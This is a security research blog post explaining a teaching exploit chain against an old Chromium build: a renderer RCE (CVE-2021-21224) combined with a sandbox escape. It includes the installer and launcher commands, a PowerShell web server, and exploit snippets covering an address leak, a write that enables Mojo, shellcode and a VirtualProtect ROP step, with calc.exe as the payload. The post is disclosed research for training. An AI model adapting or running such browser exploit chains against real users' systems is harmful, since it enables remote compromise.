Chrome Exploitation: How to easily launch a Chrome RCE+SBX exploit chain with one command

Chrome Exploitation: How to easily launch a Chrome RCE+SBX exploit chain with one command

To teach Chrome exploitation to my team, I’ve selected a previous 0day RCE that I found last year for my company VerSprite: CVE-2021-21224 https://crbug.com/1195777, and I’ve paired it with a SBX bug found by Tim Becker: https://crbug.com/1062091.

For making the exploits simpler for teaching, I’ve reduced them as much as I could. The RCE has 40 lines, and the SBX has 80 lines.

Replication:

Simply using ‘installer.bat’ will install a vulnerable Chromium version, it will automatically hack it and a calculator.exe will be launched as proof of successful exploitation:
https://raw.githubusercontent.com/VerSprite/research/master/exploits/VS-2021-001/installer.bat

That’s all. Just double-clicking/running installer.bat will perform the RCE+SBX Chrome exploit and you’ll see calc.exe as proof.

Environment:

These scripts work fine in Windows 10 x64 and Windows 11 x64 and nothing else needs to be installed. In case you need a VM, you can get a ready-to-use VM from the official Microsoft website:   https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
The selected option should be Win10 x64 VM and the default password is Passw0rd!

Installer information:

The following downloads Chromium from the official Google website:
curl -o chrome.zip "https://www.googleapis.com/download/storage/v1/b/chromium-browser-snapshots/o/Win_x64%%2F737173%%2Fchrome-win.zip?generation=1580439619624464&alt=media"

To decompress the package:

tar -xvf chrome.zip
Then, download the RCE & SBX exploits from VerSprite github, and the required mojo files:
for %%z in (rce.html sbx.html launcher.bat mojo_bindings.js installed_app_provider.mojom.js blob_registry.mojom.js url.mojom.js) do curl --remote-name https://raw.githubusercontent.com/VerSprite/research/master/exploits/VS-2021-001/%%z

Note: In case you would like to verify the integrity of the mojo files (which are: mojo_bindings.js installed_app_provider.mojom.js blob_registry.mojom.js url.mojom.js), they can be found in the “gen” directory after decompressing this Chromium_ASAN package from the official Google website:
https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release_x64%2Fasan-win32-release_x64-736938.zip?generation=1580409414119195&alt=media

When the installation is finished, it will proceed to launch the next script:

launcher.bat

Launcher information:

This launches the browser and visits a website containing the RCE:
start /b chrome-win\chrome.exe http://127.0.0.1:8000/rce.html

Launch a minimal http server:

powershell -command "$h = New-Object System.Net.HttpListener; $h.Prefixes.Add('http://127.0.0.1:8000/'); $h.Start(); while ($true){$c = $h.GetContext(); $z = Join-Path -Path $PWD.Path -ChildPath $c.Request.RawUrl.split('/')[-1]; $f = 'j'; if ([IO.File]::Exists($z)){$f = (Get-Content -Path ($z) -Raw);} $b = [System.Text.Encoding]::UTF8.GetBytes($f); $c.Response.OutputStream.WriteAsync($b, 0, ($c.Response.ContentLength64 = $b.Length))}"
Note: I have chosen powershell for the http server so we will not need to compile/install anything, as powershell is already included in Windows.

You can simply use ‘installer.bat’ and it will launch the RCE+SBX and calculator.exe will be visible. The exploit chain is reliable, but it is not %100 reliable so you might need to launch launcher.bat twice.

RCE exploit information:

To find the module base address of chrome.dll :
chrome_dll = d.getUint32(0, true) + 2**32*d.getUint32(4, true) - 0x7573E88

This performs a limited write in a backing store pointer, to perform an arbitrary write in a flag for enabling Mojo, as Mojo is required for the SBX exploit:
write8(addrof(m) + 0x1cn, BigInt(chrome_dll) + 0x7627657n)//mojoenable
d.setUint32(0, 0x1111111111, true)

Store the module base address of chrome.dll so it will be read in the SBX exploit:
localStorage.setItem('chrome_dll', chrome_dll)

Restore some of the corrupted values to prevent crashing on garbage collection:
b[1][10] = b_1_10
b[0] = 0
a1 = 0

Launch the SBX exploit:
location = 'sbx.html'

SBX exploit information:

To load the module base address of chrome.dll that was previously obtained in the RCE exploit:
let chrome_dll = BigInt(localStorage.getItem('chrome_dll'))

To use a shellcode that I have modified from Rajvardhan Agarwal for launching calculator.exe:
let sh = [0x00c0e8f0e48348fcn,  …..

To use a VirtualProtect ROPchain for making the stack to be executable:
set(7, 0x633443fn /*VirtualProtect*/)

Chrome

VS-Labs: Security Research

We Solve Complex Technical Challenges VerSprite’s Research and Development division (a.k.a VS-Labs) is comprised of individuals who are passionate about diving into the internals of various technologies. Our clients rely on VerSprite’s unique offerings of zero-day vulnerability research and exploit development to protect their assets from various threat actors. From advanced technical security training to our research for hire B.O.S.S offering, we help organizations solve their most complex technical challenges.